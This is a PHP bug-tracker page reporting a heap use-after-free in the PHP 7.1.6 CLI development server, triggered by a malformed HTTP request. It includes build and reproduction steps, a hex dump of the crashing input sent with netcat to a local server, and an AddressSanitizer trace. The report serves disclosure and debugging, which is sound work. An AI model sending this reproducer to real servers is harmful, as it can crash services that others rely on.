|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2017-07-01 06:47 UTC] l dot wei at ntu dot edu dot sg
[2017-07-01 20:47 UTC] stas@php.net
-Type: Security
+Type: Bug
[2017-07-01 20:47 UTC] stas@php.net
[2017-07-02 01:53 UTC] l dot wei at ntu dot edu dot sg
[2021-12-14 14:43 UTC] cmb@php.net
-Status: Open
+Status: Feedback
-Assigned To:
+Assigned To: cmb
[2021-12-14 14:43 UTC] cmb@php.net
[2021-12-26 04:22 UTC] php-bugs at lists dot php dot net
|
|||||||||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Sat Apr 20 06:01:28 2024 UTC |
Description: ------------ A malformed HTTP packet is able to trigger a use-after-free in the CLI server shipped with PHP. Demonstrated on x86 Ubuntu with php-7.1.6 ASan build. Build options: CC="`which gcc`" CFLAGS="-O0 -g -fsanitize=address" ./configure --prefix="`pwd`/../php7_x86/asan" --disable-shared --enable-mbstring --enable-wddx Save the hex dump of min_repro.zip to min_repro.hex $ xxd -r min_repro.hex > min_repro.zip $ unzip min_repro.zip // to min_repro $ export USE_ZEND_OPTIONS=0 $ asan/bin/php -S 127.0.0.1:12345 In another terminal, do $ cat min_repro | nc 127.0.0.1 12345 It may take a few tries to reproduce the issue. Test script: --------------- $ xxd -g 1 min_repro.zip 0000000: 50 4b 03 04 14 00 02 00 08 00 4e 51 e1 4a 88 f3 PK........NQ.J.. 0000010: 3e ba 38 00 00 00 ff 17 00 00 09 00 1c 00 6d 69 >.8...........mi 0000020: 6e 5f 72 65 70 72 6f 55 54 09 00 03 93 04 57 59 n_reproUT.....WY 0000030: b2 04 57 59 75 78 0b 00 01 04 e8 03 00 00 04 e8 ..WYux.......... 0000040: 03 00 00 ed c8 a1 11 80 30 10 00 41 9f 2a be 02 ........0..A.*.. 0000050: 78 2c 15 c4 c1 4c 42 ff ad 30 88 04 41 03 88 5d x,...LB..0..A..] 0000060: 71 e2 ce a3 f5 58 73 88 fa 74 5b b2 5c f3 ed 91 q....Xs..t[.\... 0000070: af f2 39 00 00 00 00 00 c0 cf dc 50 4b 01 02 1e ..9........PK... 0000080: 03 14 00 02 00 08 00 4e 51 e1 4a 88 f3 3e ba 38 .......NQ.J..>.8 0000090: 00 00 00 ff 17 00 00 09 00 18 00 00 00 00 00 01 ................ 00000a0: 00 00 00 80 81 00 00 00 00 6d 69 6e 5f 72 65 70 .........min_rep 00000b0: 72 6f 55 54 05 00 03 93 04 57 59 75 78 0b 00 01 roUT.....WYux... 00000c0: 04 e8 03 00 00 04 e8 03 00 00 50 4b 05 06 00 00 ..........PK.... 00000d0: 00 00 01 00 01 00 4f 00 00 00 7b 00 00 00 00 00 ......O...{..... Expected result: ---------------- No Crash (Malformed HTTP request) Actual result: -------------- $ asan/bin/php -S 127.0.0.1:12345 PHP 7.1.6 Development Server started at Sat Jul 1 10:56:27 2017 Listening on http://127.0.0.1:12345 Document root is /home/weilei/php7_x86 Press Ctrl-C to quit. ================================================================= ==30329== ERROR: AddressSanitizer: heap-use-after-free on address 0xb57048b3 at pc 0x92208a9 bp 0xbfadcca8 sp 0xbfadcc9c READ of size 1 at 0xb57048b3 thread T0 #0 0x92208a8 in php_cli_server_client_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1726 #1 0x9227e83 in php_cli_server_recv_event_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2329 #2 0x9228940 in php_cli_server_do_event_for_each_fd_callback /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2424 #3 0x921aade in php_cli_server_poller_iter_on_active /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:841 #4 0x9228ad3 in php_cli_server_do_event_for_each_fd /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2442 #5 0x9228bec in php_cli_server_do_event_loop /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2452 #6 0x9229216 in do_cli_server /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2554 #7 0x920c626 in main /home/weilei/php-7.1.6/sapi/cli/php_cli.c:1384 #8 0xb5ab8a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82) #9 0x80667d0 in _start (/home/weilei/php7_x86/asan/bin/php+0x80667d0) 0xb57048b3 is located 3 bytes inside of 5-byte region [0xb57048b0,0xb57048b5) freed by thread T0 here: #0 0xb6167774 (/usr/lib/i386-linux-gnu/libasan.so.0+0x16774) #1 0x921fa5e in php_cli_server_client_read_request_on_header_value /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1623 #2 0x9211145 in php_http_parser_execute /home/weilei/php-7.1.6/sapi/cli/php_http_parser.c:1569 #3 0x922060d in php_cli_server_client_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1712 #4 0x9227e83 in php_cli_server_recv_event_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2329 #5 0x9228940 in php_cli_server_do_event_for_each_fd_callback /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2424 #6 0x921aade in php_cli_server_poller_iter_on_active /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:841 #7 0x9228ad3 in php_cli_server_do_event_for_each_fd /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2442 #8 0x9228bec in php_cli_server_do_event_loop /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2452 #9 0x9229216 in do_cli_server /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2554 #10 0x920c626 in main /home/weilei/php-7.1.6/sapi/cli/php_cli.c:1384 #11 0xb5ab8a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82) previously allocated by thread T0 here: #0 0xb6167854 (/usr/lib/i386-linux-gnu/libasan.so.0+0x16854) #1 0x8c86d58 in __zend_malloc /home/weilei/php-7.1.6/Zend/zend_alloc.c:2820 #2 0x8c84c71 in _safe_malloc /home/weilei/php-7.1.6/Zend/zend_alloc.c:2477 #3 0x92207a7 in php_cli_server_client_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1722 #4 0x9227e83 in php_cli_server_recv_event_read_request /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2329 #5 0x9228940 in php_cli_server_do_event_for_each_fd_callback /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2424 #6 0x921aade in php_cli_server_poller_iter_on_active /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:841 #7 0x9228ad3 in php_cli_server_do_event_for_each_fd /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2442 #8 0x9228bec in php_cli_server_do_event_loop /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2452 #9 0x9229216 in do_cli_server /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:2554 #10 0x920c626 in main /home/weilei/php-7.1.6/sapi/cli/php_cli.c:1384 #11 0xb5ab8a82 (/lib/i386-linux-gnu/libc.so.6+0x19a82) SUMMARY: AddressSanitizer: heap-use-after-free /home/weilei/php-7.1.6/sapi/cli/php_cli_server.c:1726 php_cli_server_client_read_request Shadow bytes around the buggy address: 0x36ae08c0: fa fa fd fd fa fa 04 fa fa fa fd fd fa fa 00 00 0x36ae08d0: fa fa 04 fa fa fa 00 00 fa fa 04 fa fa fa 00 00 0x36ae08e0: fa fa 04 fa fa fa fd fd fa fa fd fd fa fa 04 fa 0x36ae08f0: fa fa 00 fa fa fa fd fa fa fa fd fd fa fa 00 04 0x36ae0900: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 05 fa =>0x36ae0910: fa fa fd fa fa fa[fd]fa fa fa fd fa fa fa fd fd 0x36ae0920: fa fa 00 04 fa fa 00 03 fa fa 00 03 fa fa 00 00 0x36ae0930: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fa 0x36ae0940: fa fa 00 00 fa fa 04 fa fa fa fd fd fa fa 00 00 0x36ae0950: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x36ae0960: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap righ redzone: fb Freed Heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 ASan internal: fe ==30329== ABORTING Aborted